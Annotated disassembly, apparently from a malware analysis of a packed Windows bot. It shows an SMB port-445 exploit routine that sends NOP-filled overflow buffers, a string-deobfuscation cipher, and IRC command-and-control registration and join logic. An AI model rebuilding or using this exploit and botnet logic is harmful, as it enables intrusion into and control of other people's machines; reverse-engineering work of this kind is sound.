arg_7B = byte ptr 7Fh
arg_7C = byte ptr 80h
arg_A4 = byte ptr 0A8h
arg_C4 = byte ptr 0C8h
arg_C5 = byte ptr 0C9h
arg_C8 = byte ptr 0CCh
arg_D8 = byte ptr 0DCh
arg_EC = byte ptr 0F0h
arg_660 = byte ptr 664h
arg_6D4 = byte ptr 6D8h
arg_770 = byte ptr 774h
arg_E78 = dword ptr 0E7Ch
arg_E88 = byte ptr 0E8Ch
arg_EB8 = dword ptr 0EBCh
arg_EC8 = byte ptr 0ECCh
arg_11EC = dword ptr 11F0h
arg_11F0 = dword ptr 11F4h
arg_11FC = byte ptr 1200h
arg_1410 = byte ptr 1414h
arg_148C = byte ptr 1490h
arg_1504 = byte ptr 1508h
arg_1C5C = byte ptr 1C60h
arg_2107 = byte ptr 210Bh
arg_23D0 = byte ptr 23D4h
arg_23F4 = byte ptr 23F8h
arg_2464 = byte ptr 2468h
arg_2468 = byte ptr 246Ch
arg_2F28 = byte ptr 2F2Ch
arg_44CC = byte ptr 44D0h
arg_4541 = byte ptr 4545h
arg_5560 = byte ptr 5564h
arg_6028 = byte ptr 602Ch
arg_6090 = byte ptr 6094h
arg_6098 = byte ptr 609Ch
arg_6099 = byte ptr 609Dh
arg_609C = byte ptr 60A0h
arg_8208 = dword ptr 820Ch

        mov eax, 8214h
        call sub_403690
        mov eax, dword_404B04
        mov ecx, dword_404B08
        push ebp
        push esi
        mov esi, 1
        push 0
        push esi
        push 2
        mov [esp+14h+arg_8], eax
        mov [esp+14h+arg_C], ecx
        mov [esp+14h+arg_4], esi ; status slot starts at 1
        call dword_401128 ; socket
        mov ebp, eax ; ebp = socket
        cmp ebp, 0FFFFFFFFh
        jz loc_401C7D
        push ebx
        mov ebx, [esp+18h+arg_8208] ; ebx = target address
        push edi
        push 1Dh
        push ebx
        call dword_401120 ; inet_ntoa
        lea edx, [esp+24h+arg_38]
        push eax
        push edx
        call dword_401094 ; lstrcpynA
        ; format the dotted address into a string using the format at dword_404AF8
        lea eax, [esp+2Ch+arg_2C]
        lea ecx, [esp+2Ch+arg_4]
        push eax
        push offset dword_404AF8
        push ecx
        call dword_4010E8 ; wsprintfA
        add esp, 0Ch
        xor eax, eax
        lea ecx, [esp+2Ch+arg_C5]

loc_40175D: ; CODE XREF: sub_4016E0+8Ej
        ; widen 28h bytes of the formatted string to 2 bytes per character
        mov dl, byte ptr [esp+eax+2Ch+arg_4]
        inc eax
        mov [ecx-1], dl
        mov byte ptr [ecx], 0
        add ecx, 2
        cmp eax, 28h
        jl short loc_40175D
        ; copy an 18h-dword template from dword_40460C and splice the widened
        ; string plus trailer bytes (dword_404663 ..) into it
        mov ecx, 18h
        mov esi, offset dword_40460C
        lea edi, [esp+2Ch+arg_4C]
        xor eax, eax
        rep movsd
        or ecx, 0FFFFFFFFh
        lea edi, [esp+2Ch+arg_4]
        repne scasb
        not ecx
        dec ecx ; ecx = strlen of the formatted string
        lea esi, [esp+2Ch+arg_C4]
        shl ecx, 1
        mov eax, ecx
        lea edi, [esp+2Ch+arg_7C]
        shr ecx, 2
        rep movsd
        mov ecx, eax
        xor eax, eax
        and ecx, 3
        mov edx, dword_404663
        rep movsb
        lea edi, [esp+2Ch+arg_4]
        or ecx, 0FFFFFFFFh
        repne scasb
        not ecx
        mov eax, dword_404667
        dec ecx
        lea edi, [esp+2Ch+arg_4]
        push 1BDh ; 445, consumed by the ntohs call further down
        lea ecx, [esp+ecx*2+30h+arg_7B]
        mov [ecx], edx
        mov dl, byte_40466B
        mov [ecx+4], eax
        xor eax, eax
        mov [ecx+8], dl
        or ecx, 0FFFFFFFFh
        repne scasb
        not ecx
        dec ecx
        lea edi, [esp+30h+arg_4]
        ; length bytes inside the template are derived from the string length
        add cl, 1Ah
        shl cl, 1
        mov [esp+17h], cl ; also kept as the length of a later send
        mov [esp+30h+arg_4F], cl
        or ecx, 0FFFFFFFFh
        repne scasb
        not ecx
        dec ecx
        mov eax, 31313131h
        shl cl, 1
        add cl, 9
        lea edi, [esp+30h+arg_1504]
        mov [esp+30h+arg_79], cl
        mov ecx, 38Ah
        rep stosd ; fill with '1' bytes
        stosb
        ; build the 16-byte socket address for connect
        xor eax, eax
        mov [esp+30h+var_8], eax
        mov word ptr [esp+30h+var_8], 2
        mov [esp+30h+var_4], eax
        mov [esp+30h], eax
        mov [esp+30h+arg_0], eax
        call dword_40112C ; ntohs
        lea ecx, [esp+30h+var_C]
        push 10h
        push ecx
        push ebp
        mov [esp+3Ch+var_A], ax ; port 445 in network byte order
        mov [esp+3Ch+var_8], ebx ; target address
        call dword_401124 ; connect
        cmp eax, 0FFFFFFFFh
        jz loc_401C67
        mov ebx, dword_4010B8 ; ebx = Sleep from here on
        push 1F4h
        call ebx ; Sleep
        mov esi, dword_401148 ; esi = send
        ; ---- fixed exchange 1 ----
        push 0
        push 89h
        push offset dword_4043F4
        push ebp
        call esi ; send
        push 1F4h
        call ebx ; Sleep
        mov edi, dword_401144 ; edi = recv
        push 0
        lea edx, [esp+58h+arg_EC]
        push 640h
        push edx
        push ebp
        call edi ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_401C5E
        ; ---- fixed exchange 2 ----
        push 0
        push 0A8h
        push offset dword_404480
        push ebp
        call esi ; send
        push 1F4h
        call ebx ; Sleep
        push 0
        lea eax, [esp+7Ch+arg_C8]
        push 640h
        push eax
        push ebp
        call edi ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_401C5E
        ; ---- fixed exchange 3 ----
        push 0
        push 0DEh
        push offset dword_40452C
        push ebp
        call esi ; send
        push 1F4h
        call ebx ; Sleep
        push 0
        lea ecx, [esp+0A0h+arg_A4]
        push 640h
        push ecx
        push ebp
        call edi ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_401C5E
        cmp eax, 46h ; reply must be at least 46h bytes
        jl loc_401C5E
        ; one reply byte selects the buffer layout ('1' -> first variant)
        cmp [esp+0ACh+arg_D8], 31h
        jnz loc_401B0A
        ; ---- layout variant A: 1F4h dwords of 90h fill ----
        mov ecx, 1F4h
        mov eax, 90909090h
        lea edi, [esp+0ACh+arg_6D4]
        push offset loc_404120
        rep stosd
        mov [esp+0B0h+var_98], 0 ; variant flag = 0
        call dword_4010B4 ; lstrlenA
        mov ecx, eax
        mov esi, offset loc_404120
        mov edx, ecx
        lea edi, [esp+0B0h+arg_770]
        shr ecx, 2
        rep movsd
        mov ecx, edx
        lea eax, [esp+0B0h+var_94]
        and ecx, 3
        push eax
        rep movsb
        call dword_4010B4 ; lstrlenA
        mov ecx, eax
        lea esi, [esp+0B4h+var_98]
        mov edx, ecx
        lea edi, [esp+0B4h+arg_E88]
        shr ecx, 2
        rep movsd
        mov eax, dword_404A38
        mov ecx, edx
        and ecx, 3
        rep movsb
        mov [esp+0B4h+arg_E78], eax

loc_40199F: ; CODE XREF: sub_4016E0+511j
        ; both variants continue here: send the template built earlier
        ; (length = saved length byte + 4), then two more fixed exchanges
        movsx ecx, byte ptr [esp+13h]
        mov esi, dword_401148
        add ecx, 4
        push 0
        lea edx, [esp+0B8h+var_38]
        push ecx
        push edx
        push ebp
        call esi ; send
        push 1F4h
        call ebx ; Sleep
        mov edi, dword_401144
        push 0
        lea eax, [esp+0CCh+arg_78]
        push 640h
        push eax
        push ebp
        call edi ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_401C5E
        push 0
        push 68h
        push offset dword_404670
        push ebp
        call esi ; send
        push 1F4h
        call ebx ; Sleep
        push 0
        lea ecx, [esp+0F0h+arg_54]
        push 640h
        push ecx
        push ebp
        call edi ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_401C5E
        push 0
        push 0A0h
        push offset dword_4046DC
        push ebp
        call esi ; send
        push 1F4h
        call ebx ; Sleep
        push 0
        lea edx, [esp+114h+arg_30]
        push 640h
        push edx
        push ebp
        call edi ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_401C5E
        mov eax, [esp+120h+var_10C] ; variant flag
        test eax, eax
        jz loc_401BF6
        ; ---- variant B final stage: two sends, 10FCh then 0FDCh bytes ----
        mov ecx, 1Ah
        mov esi, offset dword_404894
        lea edi, [esp+120h+arg_6028]
        push 0
        rep movsd
        mov ecx, 6D6h
        lea esi, [esp+124h+arg_44CC]
        lea edi, [esp+124h+arg_6090]
        lea eax, [esp+124h+arg_6028]
        rep movsd
        movsw
        mov ecx, 1Ch
        mov esi, offset dword_404900
        lea edi, [esp+124h+arg_23F4]
        push 10FCh
        rep movsd
        mov ecx, 297h
        lea esi, [esp+128h+arg_5560]
        lea edi, [esp+128h+arg_2464]
        push eax
        rep movsd
        movsw
        mov ecx, 21h
        mov esi, offset dword_404974
        lea edi, [esp+12Ch+arg_2F28]
        push ebp
        rep movsd
        mov esi, dword_401148
        call esi ; send
        push 1F4h
        call ebx ; Sleep
        push 0
        lea ecx, [esp+138h+arg_C]
        push 640h
        push ecx
        push ebp
        call dword_401144 ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_401C5E
        push 0
        lea edx, [esp+148h+arg_23D0]
        push 0FDCh
        push edx
        push ebp
        call esi ; send
        jmp loc_401C4F
; ---------------------------------------------------------------------------

loc_401B0A: ; CODE XREF: sub_4016E0+245j
        ; ---- layout variant B: 36Bh dwords of 90h fill ----
        mov ecx, 36Bh
        mov eax, 90909090h
        lea edi, [esp+0ACh+arg_6D4]
        mov edx, dword_404A74
        rep stosd
        mov edi, offset loc_404120
        or ecx, 0FFFFFFFFh
        xor eax, eax
        mov esi, offset loc_404120
        repne scasb
        not ecx
        dec ecx ; ecx = strlen(loc_404120)
        lea edi, [esp+0ACh+arg_EC8]
        mov eax, ecx
        mov [esp+0ACh+arg_EB8], edx
        shr ecx, 2
        rep movsd
        mov ecx, eax
        xor eax, eax
        and ecx, 3
        mov [esp+0ACh+var_98], 1 ; variant flag = 1
        rep movsb
        mov ecx, dword_404AF0
        mov edi, offset loc_404120
        mov [esp+0ACh+arg_11EC], ecx
        or ecx, 0FFFFFFFFh
        repne scasb
        not ecx
        dec ecx
        mov [esp+0ACh+arg_11F0], edx
        mov edx, ecx
        mov esi, offset loc_404120
        lea edi, [esp+0ACh+arg_11FC]
        shr ecx, 2
        rep movsd
        mov ecx, edx
        and ecx, 3
        rep movsb
        lea esi, [esp+0ACh+arg_4541]

loc_401B9F: ; CODE XREF: sub_4016E0+4D5j
        ; widen 0DACh bytes of the filled buffer to 2 bytes each
        mov cl, [esp+eax+0ACh+arg_6D4]
        inc eax
        mov [esi-1], cl
        mov byte ptr [esi], 0
        add esi, 2
        cmp eax, 0DACh
        jl short loc_401B9F
        mov ecx, 714h
        mov eax, 31313131h
        lea edi, [esp+0ACh+arg_609C]
        mov [esp+0ACh+arg_6098], 0
        rep stosd
        stosw
        mov ecx, 714h
        mov eax, 31313131h
        lea edi, [esp+0ACh+arg_2468]
        mov [esp+0ACh+arg_6099], 0
        rep stosd
        stosw
        jmp loc_40199F
; ---------------------------------------------------------------------------

loc_401BF6: ; CODE XREF: sub_4016E0+368j
        ; ---- variant A final stage: one send of 0CF8h bytes ----
        mov ecx, 1Fh
        mov esi, offset dword_404780
        lea edi, [esp+120h+arg_1410]
        push 0
        rep movsd
        mov ecx, 1F4h
        lea esi, [esp+124h+arg_660]
        lea edi, [esp+124h+arg_148C]
        lea eax, [esp+124h+arg_1410]
        rep movsd
        mov ecx, 24h
        mov esi, offset off_404800
        lea edi, [esp+124h+arg_1C5C]
        push 0CF8h
        push eax
        push ebp
        rep movsd
        mov [esp+130h+arg_2107], 0
        call dword_401148 ; send

loc_401C4F: ; CODE XREF: sub_4016E0+425j
        push 1F4h
        call ebx ; Sleep
        mov [esp+134h+var_11C], 0 ; presumably clears the status slot - confirm

loc_401C5E: ; CODE XREF: sub_4016E0+1CCj
            ; sub_4016E0+1FDj ...
        push 2
        push ebp
        call dword_40113C ; shutdown

loc_401C67: ; CODE XREF: sub_4016E0+182j
        push ebp
        call dword_401140 ; closesocket
        mov eax, [esp+140h+var_128]
        pop edi
        pop ebx
        pop esi
        pop ebp
        add esp, 8214h
        retn
; ---------------------------------------------------------------------------

loc_401C7D: ; CODE XREF: sub_4016E0+38j
        mov eax, esi ; esi is still 1 here
        pop esi
        pop ebp
        add esp, 8214h
        retn
sub_4016E0 endp ; sp-analysis failed

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; sub_401C90 - rotate one letter within its alphabet.
; In (cdecl): arg_0 = character, arg_4 = signed shift
; Out: al = shifted character; characters that are not A-Z or a-z are returned
;      unchanged
; The two alphabets are copied to the stack (27 bytes each, including the
; terminator). A negative shift has 1Ah (26) added once before use, then the
; result index is (position + shift) mod 26 via idiv.
; NOTE(review): a shift below -26 would leave a negative index; the only caller
; in this excerpt (sub_401D40) passes the negation of its running key.
sub_401C90 proc near ; CODE XREF: sub_401D40+26p

var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 4
arg_4 = dword ptr 8

        sub esp, 38h
        mov ecx, 6
        push ebx
        push esi
        push edi
        mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        lea edi, [esp+44h+var_38]
        rep movsd
        movsw
        movsb
        mov ecx, 6
        mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
        lea edi, [esp+44h+var_1C]
        rep movsd
        movsw
        movsb
        mov edi, [esp+44h+arg_4] ; edi = shift
        test edi, edi
        jge short loc_401CC7
        add edi, 1Ah

loc_401CC7: ; CODE XREF: sub_401C90+32j
        mov bl, [esp+44h+arg_0]
        lea eax, [esp+44h+var_38]
        movsx esi, bl
        push esi
        push eax
        call sub_4036C0 ; strchr
        add esp, 8
        test eax, eax
        jz short loc_401CFB
        ; upper-case letter: index = (offset in alphabet + shift) mod 26
        lea ecx, [esp+44h+var_38]
        sub eax, ecx
        mov ecx, 1Ah
        add eax, edi
        pop edi
        cdq
        idiv ecx
        pop esi
        pop ebx
        mov al, [esp+edx+38h+var_38]
        add esp, 38h
        retn
; ---------------------------------------------------------------------------

loc_401CFB: ; CODE XREF: sub_401C90+4Ej
        lea edx, [esp+44h+var_1C]
        push esi
        push edx
        call sub_4036C0 ; strchr
        add esp, 8
        test eax, eax
        jz short loc_401D28
        ; lower-case letter: same computation on the lower-case alphabet
        lea ecx, [esp+44h+var_1C]
        sub eax, ecx
        mov ecx, 1Ah
        add eax, edi
        pop edi
        cdq
        idiv ecx
        pop esi
        pop ebx
        mov al, [esp+edx+38h+var_1C]
        add esp, 38h
        retn
; ---------------------------------------------------------------------------

loc_401D28: ; CODE XREF: sub_401C90+7Bj
        pop edi
        mov al, bl ; not a letter: return the input unchanged
        pop esi
        pop ebx
        add esp, 38h
        retn
sub_401C90 endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; sub_401D40 - decode a letter-substitution string.
; In (cdecl): arg_0 = destination buffer, arg_4 = encoded source string,
;             arg_8 = initial key
; For every source character the output is sub_401C90(char, -key). After each
; character that is a letter, the key becomes that source letter's position in
; the alphabet (0..25), so every letter is decoded with the previous encoded
; letter as its key. Non-letters pass through and leave the key unchanged.
; The destination is NUL-terminated; no destination length is taken.
; Called from sub_4028D0 (not in this excerpt); presumably used to recover
; obfuscated strings at run time - confirm against the caller.
sub_401D40 proc near ; CODE XREF: sub_4028D0+64p
                     ; sub_4028D0+95p

arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch

        push ebx
        push ebp
        mov ebp, [esp+8+arg_4] ; ebp = source cursor
        push esi
        mov esi, [esp+0Ch+arg_8] ; esi = running key
        mov bl, [ebp+0]
        test bl, bl
        jz short loc_401D9F
        push edi
        mov edi, [esp+10h+arg_0] ; edi = destination cursor

loc_401D57: ; CODE XREF: sub_401D40+56j
        mov eax, esi
        ; the arg_0 stack slot is reused as scratch to pass the character
        mov byte ptr [esp+10h+arg_0], bl
        mov ecx, [esp+10h+arg_0]
        inc ebp
        neg eax ; shift = -key
        push eax
        push ecx
        call sub_401C90
        add esp, 8
        mov [edi], al
        inc edi
        cmp bl, 61h
        jl short loc_401D81
        cmp bl, 7Ah
        jg short loc_401D81
        movsx esi, bl
        sub esi, 61h ; key = source letter - 'a'

loc_401D81: ; CODE XREF: sub_401D40+34j
            ; sub_401D40+39j
        cmp bl, 41h
        jl short loc_401D91
        cmp bl, 5Ah
        jg short loc_401D91
        movsx esi, bl
        sub esi, 41h ; key = source letter - 'A'

loc_401D91: ; CODE XREF: sub_401D40+44j
            ; sub_401D40+49j
        mov bl, [ebp+0]
        test bl, bl
        jnz short loc_401D57
        mov [edi], bl ; terminate the output
        pop edi
        pop esi
        pop ebp
        pop ebx
        retn
; ---------------------------------------------------------------------------

loc_401D9F: ; CODE XREF: sub_401D40+10j
        ; empty source: write an empty string
        mov edx, [esp+0Ch+arg_0]
        pop esi
        pop ebp
        pop ebx
        mov byte ptr [edx], 0
        retn
sub_401D40 endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; sub_401DB0 - initialise a connection object.
; In:  ecx = object
; Out: eax = object
; Stores the result of sub_403640(20000h) at obj+2Ch; sub_401E10 uses that
; pointer as its receive buffer. The result is not checked for failure.
sub_401DB0 proc near ; CODE XREF: sub_402590+70p
        push esi
        mov esi, ecx
        push 20000h
        call sub_403640
        add esp, 4
        mov [esi+2Ch], eax
        mov eax, esi
        pop esi
        retn
sub_401DB0 endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; sub_401DD0 - store the server name and port in a connection object.
; In:  ecx = object, arg_0 = host string, arg_4 = port (retn 8)
; Copies at most 27h bytes of the host string to obj+4 and stores arg_4 at
; obj+58h; sub_401E10 reads the low word of obj+58h as the port.
sub_401DD0 proc near ; CODE XREF: sub_402590+C9p
                     ; sub_402590+148p

arg_0 = dword ptr 4
arg_4 = dword ptr 8

        mov eax, [esp+arg_0]
        push esi
        mov esi, ecx
        push 27h
        push eax
        lea ecx, [esi+4]
        push ecx
        call dword_401094 ; lstrcpynA
        mov edx, [esp+4+arg_4]
        mov [esi+58h], edx
        pop esi
        retn 8
sub_401DD0 endp

; ---------------------------------------------------------------------------
        align 10h

; Cleanup chunk for the connection object (ecx = object), reached by a jump
; from UPX0:004036F6. Passes obj+4 and then [obj+2Ch] to sub_403660.
; NOTE(review): obj+4 is the inline host-name field written by sub_401DD0, not
; a separately allocated pointer; if sub_403660 is a free routine the first
; call looks wrong - confirm.
loc_401DF0: ; CODE XREF: UPX0:004036F6j
        push esi
        mov esi, ecx
        lea eax, [esi+4]
        push eax
        call sub_403660
        mov ecx, [esi+2Ch]
        push ecx
        call sub_403660
        add esp, 8
        pop esi
        retn
; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; sub_401E10 - connect to the configured server and register on IRC.
; In:  ecx   = connection object (host at +4, receive buffer at +2Ch, port at
;              +58h; socket is stored at +5Ch, socket address at +60h, last
;              recv length at +0)
;      arg_0 = nickname buffer
;      arg_4 = second argument for sub_402B30 when a new nickname is needed
;      arg_8 = text placed after the ':' in the USER line
; Out: eax = 0 on success, 1 on any connect/recv failure (socket is closed);
;      retn 0Ch
;
; Sequence on the wire: "PASS <9-char value from sub_402B30>", "NICK <nick>",
; then while the reply contains "already" a new nick is generated with
; sub_402B30 and NICK is resent, finally "USER <nick> 8 * :<arg_8>". Each line
; is preceded by Sleep(64h). Every received block is NUL-terminated and passed
; to sub_402090.
; sub_402BE0 and sub_402B30 are not in this excerpt; sub_402BE0 presumably
; resolves the host string to an address - confirm.
;
; NOTE(review): recv is called with length 20000h into the 20000h-byte buffer
; set up by sub_401DB0 and the terminator is written at buf[n]; a full-length
; read would write one byte past the buffer.
; NOTE(review): after each lstrlenA call IDA's displayed stack delta is 4 less
; than the real one, so the operand it labels var_128 works out to the same
; buffer as var_12C (the formatted line).
sub_401E10 proc near ; CODE XREF: sub_402590+11Ep

var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch

        sub esp, 138h
        push ebx
        push ebp
        push esi
        push edi
        push 0
        push 1
        mov esi, ecx ; esi = connection object
        push 2
        call dword_401128 ; socket
        mov [esi+5Ch], eax
        lea eax, [esi+4]
        push eax
        call sub_402BE0
        mov cx, [esi+58h]
        add esp, 4
        lea edi, [esi+60h] ; edi = socket address inside the object
        mov [esi+64h], eax ; address returned by sub_402BE0
        push ecx
        mov word ptr [edi], 2
        call dword_40112C ; ntohs
        mov edx, [esi+5Ch]
        push 10h
        push edi
        push edx
        mov [esi+62h], ax
        call dword_401124 ; connect
        test eax, eax
        jnz loc_40204A
        mov ecx, [esi+5Ch]
        push eax ; flags = 0 (eax is 0 after a successful connect)
        mov eax, [esi+2Ch]
        push 20000h
        push eax
        push ecx
        call dword_401144 ; recv
        cmp eax, 0FFFFFFFFh
        mov [esi], eax
        jz loc_40204A
        mov edx, [esi+2Ch]
        mov ecx, esi
        mov byte ptr [edx+eax], 0 ; NUL-terminate the received block
        mov eax, [esi+2Ch]
        push eax
        call sub_402090
        ; ---- PASS ----
        lea ecx, [esp+148h+var_138]
        push 9
        push ecx
        call sub_402B30
        mov ebp, dword_4010E8 ; ebp = wsprintfA
        lea edx, [esp+150h+var_138]
        push edx
        lea eax, [esp+154h+var_12C]
        push offset aPassS ; "PASS %s\r\n"
        push eax
        call ebp ; wsprintfA
        mov ebx, dword_4010B8 ; ebx = Sleep
        add esp, 14h ; cleans the sub_402B30 and wsprintfA arguments together
        push 64h
        call ebx ; Sleep
        lea ecx, [esp+148h+var_12C]
        push 0
        push ecx
        call dword_4010B4 ; lstrlenA
        push eax
        mov eax, [esi+5Ch]
        lea edx, [esp+14Ch+var_128] ; resolves to the formatted line (see header note)
        push edx
        push eax
        call dword_401148 ; send
        ; ---- NICK ----
        mov edi, [esp+148h+arg_0] ; edi = nickname
        lea ecx, [esp+148h+var_12C]
        push edi
        push offset aNickS ; "NICK %s\r\n"
        push ecx
        call ebp ; wsprintfA
        add esp, 0Ch
        push 64h
        call ebx ; Sleep
        lea edx, [esp+148h+var_12C]
        push 0
        push edx
        call dword_4010B4 ; lstrlenA
        mov ecx, [esi+5Ch]
        push eax
        lea eax, [esp+14Ch+var_128]
        push eax
        push ecx
        call dword_401148 ; send
        mov edx, [esi+2Ch]
        mov eax, [esi+5Ch]
        push 0
        push 20000h
        push edx
        push eax
        call dword_401144 ; recv
        cmp eax, 0FFFFFFFFh
        mov [esi], eax
        jz loc_40204A
        mov ecx, [esi+2Ch]
        push 64h
        mov byte ptr [ecx+eax], 0
        call ebx ; Sleep
        mov edx, [esi+2Ch]
        mov ecx, esi
        push edx
        call sub_402090
        mov eax, [esi+2Ch]
        push offset aAlready ; "already"
        push eax
        call sub_4036C6 ; strstr
        add esp, 8
        test eax, eax
        jz loc_401FF5

loc_401F6B: ; CODE XREF: sub_401E10+1DFj
        ; reply contained "already": generate another nickname and retry
        mov ecx, [esp+148h+arg_4]
        push ecx
        push edi
        call sub_402B30
        push edi
        lea edx, [esp+154h+var_12C]
        push offset aNickS ; "NICK %s\r\n"
        push edx
        call ebp ; wsprintfA
        add esp, 14h
        push 64h
        call ebx ; Sleep
        lea eax, [esp+148h+var_12C]
        push 0
        push eax
        call dword_4010B4 ; lstrlenA
        mov edx, [esi+5Ch]
        lea ecx, [esp+148h+var_128]
        push eax
        push ecx
        push edx
        call dword_401148 ; send
        mov eax, [esi+2Ch]
        mov ecx, [esi+5Ch]
        push 0
        push 20000h
        push eax
        push ecx
        call dword_401144 ; recv
        cmp eax, 0FFFFFFFFh
        mov [esi], eax
        jz loc_40204A
        mov edx, [esi+2Ch]
        mov ecx, esi
        mov byte ptr [edx+eax], 0
        mov eax, [esi+2Ch]
        push eax
        call sub_402090
        mov ecx, [esi+2Ch]
        push offset aAlready ; "already"
        push ecx
        call sub_4036C6 ; strstr
        add esp, 8
        test eax, eax
        jnz loc_401F6B

loc_401FF5: ; CODE XREF: sub_401E10+155j
        ; ---- USER ----
        mov edx, [esp+148h+arg_8]
        lea eax, [esp+148h+var_12C]
        push edx
        push edi
        push offset aUserS8S ; "USER %s 8 * :%s\r\n"
        push eax
        call ebp ; wsprintfA
        add esp, 10h
        push 64h
        call ebx ; Sleep
        lea ecx, [esp+148h+var_12C]
        push 0
        push ecx
        call dword_4010B4 ; lstrlenA
        push eax
        mov eax, [esi+5Ch]
        lea edx, [esp+14Ch+var_128]
        push edx
        push eax
        call dword_401148 ; send
        mov ecx, [esi+2Ch]
        mov edx, [esi+5Ch]
        push 0
        push 20000h
        push ecx
        push edx
        call dword_401144 ; recv
        cmp eax, 0FFFFFFFFh
        mov [esi], eax
        jnz short loc_402066

loc_40204A: ; CODE XREF: sub_401E10+50j
            ; sub_401E10+6Fj ...
        ; failure path: close the socket and return 1
        mov eax, [esi+5Ch]
        push eax
        call dword_401140 ; closesocket
        pop edi
        pop esi
        pop ebp
        mov eax, 1
        pop ebx
        add esp, 138h
        retn 0Ch
; ---------------------------------------------------------------------------

loc_402066: ; CODE XREF: sub_401E10+238j
        mov ecx, [esi+2Ch]
        mov byte ptr [ecx+eax], 0
        mov edx, [esi+2Ch]
        push edx
        mov ecx, esi
        call sub_402090
        pop edi
        pop esi
        pop ebp
        xor eax, eax
        pop ebx
        add esp, 138h
        retn 0Ch
sub_401E10 endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

sub_402090 proc near ; CODE XREF: sub_401E10+82p
                     ; sub_401E10+13Dp ...
var_190 = byte ptr -190h var_12C = byte ptr -12Ch var_128 = byte ptr -128h arg_0 = dword ptr 4 mov eax, [esp+arg_0] sub esp, 190h push ebx push esi push edi push offset aPing ; "PING" mov ebx, ecx push eax call sub_4036C6 ; strstr add esp, 8 test eax, eax jz short loc_402112 mov edi, dword_4010B4 lea esi, [eax+4] push esi call edi ; lstrlenA dec eax cmp eax, 63h jle short loc_4020D4 pop edi pop esi mov eax, 1 pop ebx add esp, 190h retn 4 ; --------------------------------------------------------------------------- loc_4020D4: ; CODE XREF: sub_402090+31j push eax lea ecx, [esp+1A0h+var_190] push esi push ecx call dword_401094 ; lstrcpynA lea edx, [esp+19Ch+var_190] lea eax, [esp+19Ch+var_12C] push edx push offset aPongS ; "PONG%s\r\n" push eax call dword_4010E8 ; wsprintfA add esp, 0Ch lea ecx, [esp+19Ch+var_12C] push 0 push ecx call edi ; lstrlenA push eax mov eax, [ebx+5Ch] lea edx, [esp+1A0h+var_128] push edx push eax call dword_401148 ; send loc_402112: ; CODE XREF: sub_402090+1Fj pop edi pop esi xor eax, eax pop ebx add esp, 190h retn 4 sub_402090 endp ; =============== S U B R O U T I N E ======================================= sub_402120 proc near ; CODE XREF: sub_402590+16Cp ; sub_402590+18Fp var_12C = byte ptr -12Ch var_128 = byte ptr -128h arg_0 = dword ptr 4 sub esp, 12Ch lea eax, [esp+12Ch+var_12C] push ebx mov ebx, [esp+130h+arg_0] push esi push edi push ebx push offset aJoinS ; "JOIN %s\r\n" mov esi, ecx push eax call dword_4010E8 ; wsprintfA mov edi, dword_4010B8 add esp, 0Ch push 64h call edi ; Sleep lea ecx, [esp+138h+var_12C] push 0 push ecx call dword_4010B4 ; lstrlenA push eax mov eax, [esi+5Ch] lea edx, [esp+13Ch+var_128] push edx push eax call dword_401148 ; send push 64h call edi ; Sleep mov ecx, [esi+2Ch] mov edx, [esi+5Ch] push 0 push 20000h push ecx push edx call dword_401144 ; recv mov ecx, [esi+2Ch] mov [esi], eax mov byte ptr [ecx+eax], 0 mov eax, [esi] cmp eax, 0FFFFFFFFh jz short loc_402210 test eax, eax jz short loc_402210 push 64h 
call edi ; Sleep mov edx, [esi+2Ch] mov ecx, esi push edx call sub_402090 mov eax, [esi+2Ch] push offset a451 ; "451" push eax call sub_4036C6 ; strstr add esp, 8 test eax, eax jz short loc_4021CF pop edi pop esi mov eax, 3 pop ebx add esp, 12Ch retn 4 ; --------------------------------------------------------------------------- loc_4021CF: ; CODE XREF: sub_402120+9Cj mov ecx, [esi+2Ch] push offset aPing ; "PING" push ecx call sub_4036C6 ; strstr add esp, 8 test eax, eax jz short loc_4021F5 pop edi pop esi mov eax, 4 pop ebx add esp, 12Ch retn 4 ; --------------------------------------------------------------------------- loc_4021F5: ; CODE XREF: sub_402120+C2j push 23h add esi, 30h push ebx push esi call dword_401094 ; lstrcpynA pop edi pop esi xor eax, eax pop ebx add esp, 12Ch retn 4 ; --------------------------------------------------------------------------- loc_402210: ; CODE XREF: sub_402120+74j ; sub_402120+78j pop edi pop esi mov eax, 2 pop ebx add esp, 12Ch retn 4 sub_402120 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_402230 proc near ; CODE XREF: sub_4022A0+AFp ; sub_402590+1CAp ... 
